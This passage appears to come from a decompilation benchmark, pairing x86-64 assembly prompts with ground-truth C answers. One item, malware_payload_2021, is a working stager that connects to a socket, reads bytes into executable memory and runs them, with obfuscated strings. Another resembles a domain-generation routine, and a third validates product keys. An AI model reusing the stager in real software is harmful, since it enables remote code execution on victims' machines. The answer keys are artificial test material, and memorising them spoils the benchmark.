37 | JZ LAB_0010125a 38 | MOV RBX,qword ptr [stdout] 39 | MOV EAX,dword ptr [RBP + -0x14] 40 | MOV EDI,EAX 41 | CALL toupper 42 | MOV RSI,RBX 43 | MOV EDI,EAX 44 | CALL putc 45 | MOV byte ptr [RBP + -0x15],0x0 46 | JMP LAB_001011da 47 | LAB_0010125a: 48 | MOV RBX,qword ptr [stdout] 49 | MOV EAX,dword ptr [RBP + -0x14] 50 | MOV EDI,EAX 51 | CALL tolower 52 | MOV RSI,RBX 53 | MOV EDI,EAX 54 | CALL putc 55 | JMP LAB_001011da 56 | LAB_0010127a: 57 | NOP 58 | MOV EAX,0x0 59 | ADD RSP,0x18 60 | POP RBX 61 | POP RBP 62 | RET 63 | //end of function funcA 64 | 65 | Reference Table: 66 | Address Data 67 | 00104020 undefined8 0000000000000000h 68 | 00104010 undefined8 0000000000000000h 69 | 00104010 undefined8 0000000000000000h 70 | 00104010 undefined8 0000000000000000h 71 | 72 | Generate just the C code for the function that produced the above x86 64-bit assembly. The C code should only represent the funcA function. The C code is idiomatic and uses functions, types, and structures from standard libraries. -------------------------------------------------------------------------------- /eval/c_corpus/prompts/demesne_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcB(int argc, char * * argv): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x60 7 | MOV dword ptr [RBP + -0x4],0x0 8 | MOV dword ptr [RBP + -0x8],EDI 9 | MOV qword ptr [RBP + -0x10],RSI 10 | CMP dword ptr [RBP + -0x8],0x2 11 | JGE LAB_004011ed 12 | MOV RDI,0x402004 13 | MOV AL,0x0 14 | CALL printf 15 | MOV dword ptr [RBP + -0x4],0xffffffff 16 | JMP LAB_004012dc 17 | LAB_004011ed: 18 | MOV RAX,qword ptr [RBP + -0x10] 19 | MOV RDI,qword ptr [RAX + 0x8] 20 | XOR EAX,EAX 21 | MOV ESI,EAX 22 | XOR EDX,EDX 23 | CALL strtol 24 | MOV dword ptr [RBP + -0x14],EAX 25 | LEA RDI,[RBP + -0x40] 26 | XOR ESI,ESI 27 | MOV EDX,0x20 28 | CALL memset 29 | MOV dword ptr [RBP + -0x44],0x0 30 | LAB_0040121a: 31 | CMP dword ptr [RBP + -0x44],0x10 32 | JGE LAB_004012d5 33 | LEA RDI,[RBP + -0x40] 34 | XOR ESI,ESI 35 | MOV EDX,0x20 36 | CALL memset 37 | MOV EAX,dword ptr [RBP + -0x14] 38 | XOR EAX,dword ptr [RBP + -0x44] 39 | MOV dword ptr [RBP + -0x48],EAX 40 | LEA RDI,[RBP + -0x48] 41 | CALL rrrand 42 | MOV dword ptr [RBP + -0x4c],EAX 43 | MOV EAX,dword ptr [RBP + -0x4c] 44 | MOV ECX,0x5 45 | CDQ 46 | IDIV ECX 47 | ADD EDX,0x5 48 | MOV dword ptr [RBP + -0x50],EDX 49 | MOV dword ptr [RBP + -0x54],0x0 50 | LAB_00401261: 51 | MOV EAX,dword ptr [RBP + -0x54] 52 | CMP EAX,dword ptr [RBP + -0x50] 53 | JGE LAB_0040129f 54 | LEA RDI,[RBP + -0x48] 55 | CALL rrrand 56 | MOV dword ptr [RBP + -0x58],EAX 57 | MOV EAX,dword ptr [RBP + -0x58] 58 | MOV ECX,0x1a 59 | CDQ 60 | IDIV ECX 61 | ADD EDX,0x61 62 | MOV CL,DL 63 | MOVSXD RAX,dword ptr [RBP + -0x54] 64 | MOV byte ptr [RBP + RAX*0x1 + -0x40],CL 65 | MOV EAX,dword ptr [RBP + -0x54] 66 | ADD EAX,0x1 67 | MOV dword ptr [RBP + -0x54],EAX 68 | JMP LAB_00401261 69 | LAB_0040129f: 70 | LEA RDI,[RBP + -0x40] 71 | MOV RSI,0x40201c 72 | CALL strcat 73 | LEA RSI,[RBP + -0x40] 74 | MOV RDI,0x402021 75 | MOV AL,0x0 76 | CALL printf 77 | MOV EAX,dword ptr [RBP + -0x44] 78 | ADD EAX,0x1 79 | MOV dword ptr [RBP + -0x44],EAX 80 | JMP LAB_0040121a 81 | LAB_004012d5: 82 | MOV dword ptr [RBP + -0x4],0x0 83 | LAB_004012dc: 84 | MOV EAX,dword ptr [RBP + -0x4] 85 | ADD RSP,0x60 86 | POP RBP 87 | RET 88 | //end of function funcB 89 | 90 | Reference Table: 91 | Address Data 92 | 00402004 ds "Please provide a seed.\n" 93 | 0040201c ?? 2Eh . 94 | 00402021 ?? 25h % 95 | 96 | Generate just the C code for the function that produced the above x86 64-bit assembly. The C code should only represent the funcB function. The C code is idiomatic and uses functions, types, and structures from standard libraries. -------------------------------------------------------------------------------- /eval/c_corpus/prompts/dublin_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcC(int argc, char * * argv): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x40 7 | MOV dword ptr [RBP + -0x4],0x0 8 | MOV dword ptr [RBP + -0x8],EDI 9 | MOV qword ptr [RBP + -0x10],RSI 10 | MOV qword ptr [RBP + -0x18],0x0 11 | MOV qword ptr [RBP + -0x20],0x0 12 | MOV qword ptr [RBP + -0x28],0x0 13 | MOV qword ptr [RBP + -0x30],0x0 14 | MOV qword ptr [RBP + -0x38],0x0 15 | LAB_0040131e: 16 | MOV dword ptr [RBP + -0x3c],0x0 17 | MOV RDI,0x402020 18 | LEA RSI,[RBP + -0x3c] 19 | MOV AL,0x0 20 | CALL __isoc99_scanf 21 | CMP EAX,0x1 22 | JZ LAB_00401348 23 | JMP LAB_00401495 24 | LAB_00401348: 25 | JMP LAB_0040134d 26 | LAB_0040134d: 27 | XOR EAX,EAX 28 | CMP qword ptr [RBP + -0x30],0x0 29 | MOV byte ptr [RBP + -0x3d],AL 30 | JZ LAB_0040136d 31 | MOV RAX,qword ptr [RBP + -0x30] 32 | MOV EAX,dword ptr [RAX + 0x8] 33 | CMP EAX,dword ptr [RBP + -0x3c] 34 | SETG AL 35 | MOV byte ptr [RBP + -0x3d],AL 36 | LAB_0040136d: 37 | MOV AL,byte ptr [RBP + -0x3d] 38 | TEST AL,0x1 39 | JNZ LAB_0040137d 40 | JMP LAB_004013af 41 | LAB_0040137d: 42 | MOV RAX,qword ptr [RBP + -0x30] 43 | MOV qword ptr [RBP + -0x38],RAX 44 | MOV RAX,qword ptr [RBP + -0x28] 45 | MOV qword ptr [RBP + -0x30],RAX 46 | CMP qword ptr [RBP + -0x28],0x0 47 | JZ LAB_004013aa 48 | MOV RAX,qword ptr [RBP + -0x28] 49 | MOV RAX,qword ptr [RAX] 50 | MOV RCX,qword ptr [RBP + -0x38] 51 | XOR RAX,RCX 52 | MOV qword ptr [RBP + -0x28],RAX 53 | LAB_004013aa: 54 | JMP LAB_0040134d 55 | LAB_004013af: 56 | JMP LAB_004013b4 57 | LAB_004013b4: 58 | XOR EAX,EAX 59 | CMP qword ptr [RBP + -0x30],0x0 60 | MOV byte ptr [RBP + -0x3e],AL 61 | JZ LAB_004013d4 62 | MOV RAX,qword ptr [RBP + -0x30] 63 | MOV EAX,dword ptr [RAX + 0x8] 64 | CMP EAX,dword ptr [RBP + -0x3c] 65 | SETL AL 66 | MOV byte ptr [RBP + -0x3e],AL 67 | LAB_004013d4: 68 | MOV AL,byte ptr [RBP + -0x3e] 69 | TEST AL,0x1 70 | JNZ LAB_004013e4 71 | JMP LAB_00401416 72 | LAB_004013e4: 73 | MOV RAX,qword ptr [RBP + -0x30] 74 | MOV qword ptr [RBP + -0x28],RAX 75 | MOV RAX,qword ptr [RBP + -0x38] 76 | MOV qword ptr [RBP + -0x30],RAX 77 | CMP qword ptr [RBP + -0x38],0x0 78 | JZ LAB_00401411 79 | MOV RAX,qword ptr [RBP + -0x38] 80 | MOV RAX,qword ptr [RAX] 81 | MOV RCX,qword ptr [RBP + -0x28] 82 | XOR RAX,RCX 83 | MOV qword ptr [RBP + -0x38],RAX 84 | LAB_00401411: 85 | JMP LAB_004013b4 86 | LAB_00401416: 87 | CMP qword ptr [RBP + -0x30],0x0 88 | JZ LAB_00401456 89 | MOV RAX,qword ptr [RBP + -0x30] 90 | MOV EAX,dword ptr [RAX + 0x8] 91 | CMP EAX,dword ptr [RBP + -0x3c] 92 | JG LAB_00401439 93 | MOV RAX,qword ptr [RBP + -0x30] 94 | MOV qword ptr [RBP + -0x28],RAX 95 | LAB_00401439: 96 | MOV RAX,qword ptr [RBP + -0x30] 97 | MOV EAX,dword ptr [RAX + 0x8] 98 | CMP EAX,dword ptr [RBP + -0x3c] 99 | JLE LAB_00401451 100 | MOV RAX,qword ptr [RBP + -0x30] 101 | MOV qword ptr [RBP + -0x38],RAX 102 | LAB_00401451: 103 | JMP LAB_00401456 104 | LAB_00401456: 105 | MOV EDI,dword ptr [RBP + -0x3c] 106 | MOV RSI,qword ptr [RBP + -0x28] 107 | MOV RDX,qword ptr [RBP + -0x38] 108 | CALL insert 109 | MOV qword ptr [RBP + -0x30],RAX 110 | CMP qword ptr [RBP + -0x28],0x0 111 | JNZ LAB_0040147d 112 | MOV RAX,qword ptr [RBP + -0x30] 113 | MOV qword ptr [RBP + -0x18],RAX 114 | LAB_0040147d: 115 | CMP qword ptr [RBP + -0x38],0x0 116 | JNZ LAB_00401490 117 | MOV RAX,qword ptr [RBP + -0x30] 118 | MOV qword ptr [RBP + -0x20],RAX 119 | LAB_00401490: 120 | JMP LAB_0040131e 121 | LAB_00401495: 122 | CMP qword ptr [RBP + -0x18],0x0 123 | JZ LAB_004014f3 124 | CMP qword ptr [RBP + -0x20],0x0 125 | JZ LAB_004014f3 126 | MOV RDI,0x402023 127 | MOV AL,0x0 128 | CALL printf 129 | MOV RDI,qword ptr [RBP + -0x18] 130 | MOV RSI,0x40202d 131 | CALL walk 132 | MOV RDI,0x402036 133 | MOV AL,0x0 134 | CALL printf 135 | MOV RDI,qword ptr [RBP + -0x20] 136 | MOV RSI,0x402040 137 | CALL walk 138 | LAB_004014f3: 139 | XOR EAX,EAX 140 | ADD RSP,0x40 141 | POP RBP 142 | RET 143 | //end of function funcC 144 | 145 | Reference Table: 146 | Address Data 147 | 00402020 ?? 25h % 148 | 00402023 ds "Forward:\n" 149 | 0040202d ds "smallest" 150 | 00402036 ds "Reverse:\n" 151 | 00402040 ds "largest" 152 | 153 | Generate just the C code for the function that produced the above x86 64-bit assembly. The C code should only represent the funcC function. The C code is idiomatic and uses functions, types, and structures from standard libraries. -------------------------------------------------------------------------------- /eval/c_corpus/prompts/leipzig_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcD(int ARGC, char * * ARGV): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x20 7 | MOV dword ptr [RBP + -0x4],0x0 8 | MOV dword ptr [RBP + -0x8],EDI 9 | MOV qword ptr [RBP + -0x10],RSI 10 | CMP dword ptr [RBP + -0x8],0x2 11 | JZ LAB_00401363 12 | MOV RDI,qword ptr [stderr] 13 | MOV RSI,0x402008 14 | MOV AL,0x0 15 | CALL fprintf 16 | MOV EDI,0x6 17 | CALL raise 18 | LAB_00401363: 19 | MOV qword ptr [COUNTER],0x0 20 | MOV RAX,qword ptr [RBP + -0x10] 21 | MOV RDI,qword ptr [RAX + 0x8] 22 | CALL atoi 23 | CDQE 24 | MOV qword ptr [CURRENT],RAX 25 | CMP qword ptr [CURRENT],0x1 26 | JGE LAB_004013b8 27 | MOV RDI,qword ptr [stderr] 28 | MOV RSI,0x40200f 29 | MOV AL,0x0 30 | CALL fprintf 31 | MOV EDI,0x6 32 | CALL raise 33 | LAB_004013b8: 34 | MOV EDI,0xa 35 | MOV RSI,0x4012d0 36 | CALL signal 37 | MOV EDI,0xc 38 | MOV RSI,0x401270 39 | CALL signal 40 | MOV EDI,0x15 41 | MOV RSI,0x4011c0 42 | CALL signal 43 | MOV EDI,0x16 44 | MOV RSI,0x401220 45 | CALL signal 46 | CALL getpid 47 | MOV dword ptr [RBP + -0x14],EAX 48 | MOV RDI,0x4040c0 49 | MOV ESI,0x1 50 | CALL __sigsetjmp 51 | MOV dword ptr [RBP + -0x18],EAX 52 | CMP dword ptr [RBP + -0x18],0x0 53 | JNZ LAB_00401438 54 | MOV dword ptr [RBP + -0x18],0x15 55 | LAB_00401438: 56 | MOV EDI,dword ptr [RBP + -0x14] 57 | MOV ESI,dword ptr [RBP + -0x18] 58 | CALL kill 59 | MOV EAX,dword ptr [RBP + -0x4] 60 | ADD RSP,0x20 61 | POP RBP 62 | RET 63 | //end of function funcD 64 | 65 | Reference Table: 66 | Address Data 67 | 004040a0 undefined8 0000000000000000h 68 | 00402008 ds "Nein!\n" 69 | 004040b8 long 0h 70 | 004040b0 long 0h 71 | 004040b0 long 0h 72 | 004040a0 undefined8 0000000000000000h 73 | 0040200f ds "Nein...\n" 74 | 004040c0 sigjmp_buf 75 | 76 | Generate just the C code for the function that produced the above x86 64-bit assembly. The C code should only represent the funcD function. The C code is idiomatic and uses functions, types, and structures from standard libraries. -------------------------------------------------------------------------------- /eval/c_corpus/prompts/malware_payload_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcE(): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x20 7 | MOV EDI,0x2 8 | MOV ESI,0x1 9 | XOR EDX,EDX 10 | CALL socket 11 | MOV dword ptr [RBP + -0x4],EAX 12 | MOV RDI,0x402004 13 | CALL inet_addr 14 | MOV dword ptr [RBP + -0x14],EAX 15 | MOV word ptr [RBP + -0x18],0x2 16 | MOV EDI,0x22b8 17 | CALL htons 18 | MOV word ptr [RBP + -0x16],AX 19 | MOV EDI,dword ptr [RBP + -0x4] 20 | LEA RSI,[RBP + -0x18] 21 | MOV EDX,0x10 22 | CALL connect 23 | CMP EAX,0x0 24 | JGE LAB_00401365 25 | MOV RDI,0x40200e 26 | CALL myprint 27 | MOV EDI,0x4 28 | CALL exit 29 | LAB_00401365: 30 | XOR EAX,EAX 31 | MOV R9D,EAX 32 | MOV ESI,0x1000 33 | MOV EDX,0x7 34 | MOV ECX,0x22 35 | MOV R8D,0xffffffff 36 | MOV RDI,R9 37 | CALL mmap 38 | MOV qword ptr [RBP + -0x20],RAX 39 | MOV EDI,dword ptr [RBP + -0x4] 40 | MOV RSI,qword ptr [RBP + -0x20] 41 | MOV EDX,0x400 42 | CALL read 43 | CMP RAX,0x0 44 | JGE LAB_004013bf 45 | MOV RDI,0x402021 46 | CALL myprint 47 | MOV EDI,0x5 48 | CALL exit 49 | LAB_004013bf: 50 | MOV RDI,0x40202d 51 | CALL myprint 52 | MOV AL,0x0 53 | CALL qword ptr [RBP + -0x20] 54 | XOR EAX,EAX 55 | ADD RSP,0x20 56 | POP RBP 57 | RET 58 | //end of function funcE 59 | 60 | Reference Table: 61 | Address Data 62 | 00402004 ds "127.0.0.1" 63 | 0040200e ds "Dpoofdujpo!gbjmfe/" 64 | 00402021 ds "Dbo(u!sfbe/" 65 | 0040202d ds "Mfu(t!hp/" 66 | 67 | Generate just the C code for the function that produced the above x86 64-bit assembly. The C code should only represent the funcE function. The C code is idiomatic and uses functions, types, and structures from standard libraries. -------------------------------------------------------------------------------- /eval/c_corpus/prompts/rotterdam_reed_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcF(int argc, char * * argv): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0xb0 7 | MOV dword ptr [RBP + -0x4],EDI 8 | MOV qword ptr [RBP + -0x10],RSI 9 | LEA RDI,[RBP + -0x90] 10 | MOV RSI,0x402050 11 | MOV EDX,0x80 12 | CALL memcpy 13 | MOV dword ptr [RBP + -0x98],0x0 14 | MOV dword ptr [RBP + -0x9c],0x0 15 | LAB_00401301: 16 | MOV EDI,dword ptr [RBP + -0x4] 17 | MOV RSI,qword ptr [RBP + -0x10] 18 | LEA RCX,[RBP + -0x90] 19 | MOV RDX,0x402018 20 | LEA R8,[RBP + -0x94] 21 | CALL getopt_long 22 | MOV dword ptr [RBP + -0xa0],EAX 23 | CMP dword ptr [RBP + -0xa0],0x0 24 | JGE LAB_0040133d 25 | JMP LAB_00401418 26 | LAB_0040133d: 27 | MOV EAX,dword ptr [RBP + -0xa0] 28 | MOV dword ptr [RBP + -0xa4],EAX 29 | SUB EAX,0x3f 30 | JZ LAB_00401404 31 | JMP LAB_00401357 32 | LAB_00401357: 33 | MOV EAX,dword ptr [RBP + -0xa4] 34 | SUB EAX,0x64 35 | JZ LAB_004013a2 36 | JMP LAB_0040136b 37 | LAB_0040136b: 38 | MOV EAX,dword ptr [RBP + -0xa4] 39 | SUB EAX,0x65 40 | JZ LAB_00401393 41 | JMP LAB_0040137f 42 | LAB_0040137f: 43 | MOV EAX,dword ptr [RBP + -0xa4] 44 | SUB EAX,0x6b 45 | JZ LAB_004013b1 46 | JMP LAB_00401409 47 | LAB_00401393: 48 | MOV dword ptr [RBP + -0x98],0x0 49 | JMP LAB_00401413 50 | LAB_004013a2: 51 | MOV dword ptr [RBP + -0x98],0x1 52 | JMP LAB_00401413 53 | LAB_004013b1: 54 | MOV RDI,qword ptr [optarg] 55 | CALL slurp 56 | MOV dword ptr [RBP + -0x9c],EAX 57 | CMP dword ptr [RBP + -0x9c],0x1 58 | JL LAB_004013de 59 | CMP dword ptr [RBP + -0x9c],0x19 60 | JLE LAB_004013fa 61 | LAB_004013de: 62 | MOV RSI,qword ptr [optarg] 63 | MOV RDI,0x40201d 64 | CALL domp 65 | JMP LAB_004013ff 66 | LAB_004013fa: 67 | JMP LAB_00401413 68 | LAB_004013ff: 69 | JMP LAB_00401404 70 | LAB_00401404: 71 | JMP LAB_00401409 72 | LAB_00401409: 73 | MOV EDI,0x1 74 | CALL _exit 75 | LAB_00401413: 76 | JMP LAB_00401301 77 | LAB_00401418: 78 | CMP dword ptr [RBP + -0x9c],0x0 79 | JNZ LAB_00401448 80 | MOV EDI,0x2 81 | MOV RSI,0x40202b 82 | MOV EDX,0xe 83 | CALL write 84 | MOV EDI,0x1 85 | CALL _exit 86 | LAB_00401448: 87 | CMP dword ptr [RBP + -0x98],0x0 88 | JZ LAB_00401466 89 | MOV EAX,0x1a 90 | SUB EAX,dword ptr [RBP + -0x9c] 91 | MOV dword ptr [RBP + -0x9c],EAX 92 | LAB_00401466: 93 | MOV EAX,dword ptr [RBP + -0x9c] 94 | ADD RSP,0xb0 95 | POP RBP 96 | RET 97 | //end of function funcF 98 | 99 | Reference Table: 100 | Address Data 101 | 00402050 addr 00402004 102 | 00402018 ?? 65h e 103 | 00404068 undefined8 0000000000000000h 104 | 00404068 undefined8 0000000000000000h 105 | 0040201d ds "Invalid key: " 106 | 0040202b ds "Key required.\n" 107 | 108 | Generate just the C code for the function that produced the above x86 64-bit assembly. The C code should only represent funcF function. The C code is idiomatic and uses functions, types, and structures from standard libraries. -------------------------------------------------------------------------------- /eval/c_corpus/prompts/winkey_check_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcG(char * key): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x50 7 | MOV qword ptr [RBP + -0x10],RDI 8 | LEA RDI,[RBP + -0x16] 9 | XOR ESI,ESI 10 | MOV EDX,0x6 11 | CALL memset 12 | LEA RDI,[RBP + -0x1a] 13 | XOR ESI,ESI 14 | MOV EDX,0x4 15 | CALL memset 16 | LEA RDI,[RBP + -0x22] 17 | XOR ESI,ESI 18 | MOV EDX,0x8 19 | CALL memset 20 | LEA RDI,[RBP + -0x28] 21 | XOR ESI,ESI 22 | MOV EDX,0x6 23 | CALL memset 24 | MOV RDI,qword ptr [RBP + -0x10] 25 | LEA RDX,[RBP + -0x16] 26 | LEA RCX,[RBP + -0x1a] 27 | LEA R8,[RBP + -0x22] 28 | LEA R9,[RBP + -0x28] 29 | MOV RSI,0x402004 30 | MOV AL,0x0 31 | CALL __isoc99_sscanf 32 | LEA RDI,[RBP + -0x16] 33 | CALL strlen 34 | CMP RAX,0x5 35 | JNZ LAB_0040124d 36 | LEA RDI,[RBP + -0x1a] 37 | CALL strlen 38 | CMP RAX,0x3 39 | JNZ LAB_0040124d 40 | LEA RDI,[RBP + -0x22] 41 | CALL strlen 42 | CMP RAX,0x7 43 | JNZ LAB_0040124d 44 | LEA RDI,[RBP + -0x28] 45 | CALL strlen 46 | CMP RAX,0x5 47 | JZ LAB_00401259 48 | LAB_0040124d: 49 | MOV dword ptr [RBP + -0x4],0xffffffff 50 | JMP LAB_004013b0 51 | LAB_00401259: 52 | LEA RDI,[RBP + -0x16] 53 | MOV RSI,0x402014 54 | LEA RDX,[RBP + -0x2c] 55 | LEA RCX,[RBP + -0x30] 56 | MOV AL,0x0 57 | CALL __isoc99_sscanf 58 | CMP dword ptr [RBP + -0x2c],0x1 59 | JL LAB_0040128d 60 | CMP dword ptr [RBP + -0x2c],0x16e 61 | JLE LAB_00401299 62 | LAB_0040128d: 63 | MOV dword ptr [RBP + -0x4],0xffffffff 64 | JMP LAB_004013b0 65 | LAB_00401299: 66 | CMP dword ptr [RBP + -0x30],0x3 67 | JLE LAB_004012b9 68 | CMP dword ptr [RBP + -0x30],0x5f 69 | JGE LAB_004012b9 70 | MOV dword ptr [RBP + -0x4],0xffffffff 71 | JMP LAB_004013b0 72 | LAB_004012b9: 73 | LEA RDI,[RBP + -0x1a] 74 | MOV ESI,0x40201b 75 | CALL strcmp 76 | CMP EAX,0x0 77 | JZ LAB_004012dc 78 | MOV dword ptr [RBP + -0x4],0xffffffff 79 | JMP LAB_004013b0 80 | LAB_004012dc: 81 | MOVSX EDI,byte ptr [RBP + -0x22] 82 | CALL ctoi 83 | CMP EAX,0x0 84 | JNZ LAB_00401312 85 | MOVSX EDI,byte ptr [RBP + -0x1b] 86 | CALL ctoi 87 | CMP EAX,0x0 88 | JZ LAB_00401312 89 | MOVSX EDI,byte ptr [RBP + -0x1b] 90 | CALL ctoi 91 | CMP EAX,0x8 92 | JLE LAB_0040131e 93 | LAB_00401312: 94 | MOV dword ptr [RBP + -0x4],0xffffffff 95 | JMP LAB_004013b0 96 | LAB_0040131e: 97 | MOVSX EDI,byte ptr [RBP + -0x21] 98 | CALL ctoi 99 | MOV dword ptr [RBP + -0x48],EAX 100 | MOVSX EDI,byte ptr [RBP + -0x20] 101 | CALL ctoi 102 | MOV ECX,EAX 103 | MOV EAX,dword ptr [RBP + -0x48] 104 | ADD EAX,ECX 105 | MOV dword ptr [RBP + -0x44],EAX 106 | MOVSX EDI,byte ptr [RBP + -0x1f] 107 | CALL ctoi 108 | MOV ECX,EAX 109 | MOV EAX,dword ptr [RBP + -0x44] 110 | ADD EAX,ECX 111 | MOV dword ptr [RBP + -0x40],EAX 112 | MOVSX EDI,byte ptr [RBP + -0x1e] 113 | CALL ctoi 114 | MOV ECX,EAX 115 | MOV EAX,dword ptr [RBP + -0x40] 116 | ADD EAX,ECX 117 | MOV dword ptr [RBP + -0x3c],EAX 118 | MOVSX EDI,byte ptr [RBP + -0x1d] 119 | CALL ctoi 120 | MOV ECX,EAX 121 | MOV EAX,dword ptr [RBP + -0x3c] 122 | ADD EAX,ECX 123 | MOV dword ptr [RBP + -0x38],EAX 124 | MOVSX EDI,byte ptr [RBP + -0x1c] 125 | CALL ctoi 126 | MOV ECX,EAX 127 | MOV EAX,dword ptr [RBP + -0x38] 128 | ADD EAX,ECX 129 | MOV dword ptr [RBP + -0x34],EAX 130 | MOV EAX,dword ptr [RBP + -0x34] 131 | MOV ECX,0x7 132 | CDQ 133 | IDIV ECX 134 | CMP EDX,0x0 135 | JZ LAB_004013a9 136 | MOV dword ptr [RBP + -0x4],0xffffffff 137 | JMP LAB_004013b0 138 | LAB_004013a9: 139 | MOV dword ptr [RBP + -0x4],0x0 140 | LAB_004013b0: 141 | MOV EAX,dword ptr [RBP + -0x4] 142 | ADD RSP,0x50 143 | POP RBP 144 | RET 145 | //end of function funcG 146 | 147 | Reference Table: 148 | Address Data 149 | 00402004 ds "%5c-%3c-%7c-%5c" 150 | 00402014 ds "%3d%2d" 151 | 0040201b ?? 4Fh O 152 | 153 | Generate just the C code for the function that produced the above x86 64-bit assembly. The C code should only represent the funcG function. The C code is idiomatic and uses functions, types, and structures from standard libraries. -------------------------------------------------------------------------------- /eval/c_corpus/source/baby_c_main_2021.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() { 5 | char cap = 1; 6 | 7 | while(1) { 8 | int c = getc(stdin); 9 | if(c == EOF) break; 10 | 11 | if(isspace(c)) { 12 | putc(c, stdout); 13 | cap = 1; 14 | } 15 | else if(cap) { 16 | putc(toupper(c), stdout); 17 | cap = 0; 18 | } 19 | else { 20 | putc(tolower(c), stdout); 21 | } 22 | } 23 | 24 | return 0; 25 | } -------------------------------------------------------------------------------- /eval/c_corpus/source/demesne_main_2021.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | int main(int argc, char** argv) { 7 | if(argc < 2){ 8 | printf("Please provide a seed.\n"); 9 | return -1; 10 | } 11 | 12 | int seed = strtol(argv[1], NULL, 0); 13 | char domain[32] = {0}; 14 | 15 | for(int i = 0; i < 16; i++){ 16 | memset(domain, 0, 32); 17 | int r = seed ^ i; 18 | int k = rrrand(&r); 19 | int l = 5 + k % 5; 20 | for(int c = 0; c 2 | #include 3 | #include 4 | 5 | #define XOR(a, b) ((uintptr_t) (a) ^ (uintptr_t) (b)) 6 | 7 | typedef struct { 8 | uintptr_t ptr; 9 | int val; 10 | } Node; 11 | 12 | int main(int argc, char** argv) { 13 | Node* head = NULL; 14 | Node* tail = NULL; 15 | 16 | Node* l = NULL; 17 | Node* c = NULL; 18 | Node* r = NULL; 19 | 20 | while(1) { 21 | int val = 0; 22 | if(scanf("%d", &val) != 1) { 23 | break; 24 | } 25 | 26 | while(c && c->val > val) { 27 | r = c; 28 | c = l; 29 | if(l) l = (Node*) XOR(l->ptr, r); 30 | 31 | // printf("Moved L: %18p %18p %18p\n", l, c, r); 32 | } 33 | 34 | while(c && c->val < val) { 35 | l = c; 36 | c = r; 37 | if(r) r = (Node*) XOR(r->ptr, l); 38 | 39 | // printf("Moved R: %18p %18p %18p\n", l, c, r); 40 | } 41 | 42 | if(c) { 43 | if(c->val <= val) l = c; 44 | if(c->val > val) r = c; 45 | } 46 | 47 | c = insert(val, l, r); 48 | if(!l) head = c; 49 | if(!r) tail = c; 50 | } 51 | 52 | if(head && tail) { 53 | printf("Forward:\n"); 54 | walk(head, "smallest"); 55 | 56 | printf("Reverse:\n"); 57 | walk(tail, "largest"); 58 | } 59 | 60 | return 0; 61 | } -------------------------------------------------------------------------------- /eval/c_corpus/source/leipzig_main_2021.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | long int COUNTER; 8 | long int CURRENT; 9 | sigjmp_buf RESTART; 10 | 11 | int main(int ARGC, char** ARGV) { 12 | if(ARGC != 2) { 13 | fprintf(stderr, "Nein!\n"); 14 | raise(SIGABRT); 15 | } 16 | 17 | COUNTER = 0; 18 | CURRENT = atoi(ARGV[1]); 19 | if(CURRENT < 1) { 20 | fprintf(stderr, "Nein...\n"); 21 | raise(SIGABRT); 22 | } 23 | 24 | signal(SIGUSR1, dec); 25 | signal(SIGUSR2, inc); 26 | signal(SIGTTIN, chk); 27 | signal(SIGTTOU, pty); 28 | 29 | volatile int PID = getpid(); 30 | int SIG = sigsetjmp(RESTART, 1); 31 | if(!SIG) SIG = SIGTTIN; 32 | kill(PID, SIG); 33 | } -------------------------------------------------------------------------------- /eval/c_corpus/source/malware_payload_2021.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | #define PROC_NAME "sshd" 17 | 18 | #define PORT 8888 19 | #define SERVER "127.0.0.1" 20 | 21 | int payload(){ 22 | int sock; 23 | int valread; 24 | struct sockaddr_in server; 25 | 26 | sock = socket(AF_INET, SOCK_STREAM, 0); 27 | 28 | server.sin_addr.s_addr = inet_addr(SERVER); 29 | server.sin_family = AF_INET; 30 | server.sin_port = htons(PORT); 31 | 32 | if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0){ 33 | myprint("Dpoofdujpo!gbjmfe/"); // Connection failed. 34 | exit(4); 35 | } 36 | 37 | void *buffer = mmap(NULL, 4096, 38 | PROT_READ | PROT_WRITE | PROT_EXEC, 39 | MAP_PRIVATE | MAP_ANONYMOUS, 40 | -1, 0); 41 | 42 | if (read(sock , buffer, 1024) < 0 ){ 43 | myprint("Dbo(u!sfbe/"); // Can't read. 44 | exit(5); 45 | } 46 | 47 | myprint("Mfu(t!hp/"); // Let's go. 48 | (*(void(*)())buffer)(); 49 | 50 | 51 | return 0; 52 | } -------------------------------------------------------------------------------- /eval/c_corpus/source/rotterdam_reed_2021.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int reed(int argc, char** argv) { 6 | struct option options[] = { 7 | {"encrypt", no_argument, NULL, 'e'}, 8 | {"decrypt", no_argument, NULL, 'd'}, 9 | {"key", required_argument, NULL, 'k'}, 10 | { NULL, 0, NULL, 0 } 11 | }; 12 | 13 | int index; 14 | int mode = 0; 15 | int key = 0; 16 | 17 | while(1) { 18 | int opt = getopt_long(argc, argv, "edk:", options, &index); 19 | if(opt < 0) break; 20 | 21 | switch(opt) { 22 | case 'e': 23 | mode = 0; 24 | break; 25 | case 'd': 26 | mode = 1; 27 | break; 28 | case 'k': 29 | key = slurp(optarg); 30 | if(key < 1 || key > 25) { 31 | domp("Invalid key: ", 